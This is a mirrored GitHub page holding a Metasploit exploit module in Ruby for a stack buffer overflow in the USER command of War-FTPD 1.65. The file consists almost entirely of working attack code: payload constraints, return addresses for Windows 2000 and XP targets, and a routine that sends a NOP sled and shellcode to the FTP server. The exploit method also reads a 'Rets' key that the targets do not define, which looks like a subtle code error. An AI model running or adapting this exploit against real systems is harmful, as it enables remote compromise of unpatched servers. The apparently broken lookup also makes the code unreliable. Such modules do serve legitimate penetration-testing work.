1
mirror of https://github.com/rapid7/metasploit-framework synced 2024-11-12 11:52:01 +01:00
metasploit-framework/modules/exploits/windows/ftp/warftpd_165_user.rb

85 lines
1.6 KiB
Ruby
Raw Normal View History

require 'msf/core/exploit/ftp'
module Msf
class Exploits::Windows::Ftp::WarFtpd165 < Msf::Exploit::Remote
include Exploit::Remote::Ftp
def initialize(info = {})
super(update_info(info,
'Name' => 'War-FTPD 1.65 Username Overflow',
'Description' => %q{
This module exploits a buffer overflow found in the USER command
in War-FTPD 1.65.
},
'Author' => 'Fairuzan Roslan <riaf [at] mysec.org>',
'Version' => '$Revision$',
'References' =>
[
[ 'OSVDB', '875' ],
[ 'MIL', '75' ],
[ 'URL', 'http://lists.insecure.org/lists/bugtraq/1998/Feb/0014.html' ],
],
'DefaultOptions' =>
{
'EXITFUNC' => 'process'
},
'Payload' =>
{
'Space' => 424,
'BadChars' => "\x00\x0a\x0d\x40",
'StackAdjustment' => -3500,
'Compat' =>
{
'ConnectionType' => "-find"
}
},
'Targets' =>
[
# Target 0
[
'Windows 2000 SP0-SP4 English',
{
'Platform' => 'win',
'Ret' => 0x750231e2 # ws2help.dll
},
],
# Target 1
[
'Windows XP SP0-SP1 English',
{
'Platform' => 'win',
'Ret' => 0x71ab1d54 # push esp, ret
}
],
# Target 2
[
'Windows XP SP2 English',
{
'Platform' => 'win',
'Ret' => 0x71ab9372 # push esp, ret
}
]
]))
end
def exploit
connect
print_status("Trying target #{target.name}...")
buf = make_nops(600) + payload.encoded
buf[485, 4] = [ target['Rets'][0] ].pack('V')
send_user(buf)
disconnect
handler
end
end
end